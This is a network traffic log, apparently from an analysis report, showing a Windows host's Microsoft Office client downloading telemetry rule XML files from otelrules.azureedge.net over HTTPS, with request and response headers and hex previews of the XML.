                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            94192.168.2.54985913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:38 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                            x-ms-request-id: 0ef5c87e-a01e-0032-285c-2e1949000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133938Z-17df447cdb5tcj54hC1DFW3yew00000002x000000000br3z
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            95192.168.2.54985813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:38 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                            x-ms-request-id: 680c0461-b01e-0084-12da-2fd736000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133938Z-17df447cdb54qlp6hC1DFWqcfc00000002tg00000000bgzg
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            96192.168.2.54986213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:38 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                            x-ms-request-id: 7751afc8-a01e-00ab-7158-2e9106000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133938Z-17df447cdb5vp9l9hC1DFW0nrw0000000300000000008yfn
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            97192.168.2.54987313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:39 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                            x-ms-request-id: 6a3542ff-401e-0078-3058-2e4d34000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133939Z-15869dbbcc6khw88hC1DFWh5f400000007a00000000008dh
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            98192.168.2.54987513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:39 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                            x-ms-request-id: 7c56904f-a01e-0053-4d5c-2e8603000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133939Z-15869dbbcc6b2ncxhC1DFW661800000001u0000000007vxm
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            99192.168.2.54987613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:39 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                            x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133939Z-16547b76f7fr4g8xhC1DFW9cqc00000005ug00000000cuv0
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            100192.168.2.54987413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:39 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                            x-ms-request-id: 45f39ff0-c01e-00a2-2d5f-2e2327000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133939Z-15869dbbcc6sg5zbhC1DFW5qyn00000001e0000000003ny8
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            101192.168.2.54988413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:40 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:40 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                            x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133940Z-16547b76f7f7rtshhC1DFWrtqn00000006n000000000ggyk
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            102192.168.2.54988813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:40 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:40 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                            x-ms-request-id: a01aecef-901e-005b-2d5f-2e2005000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133940Z-15869dbbcc6vr5dxhC1DFWqn6400000001dg000000004y6q
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
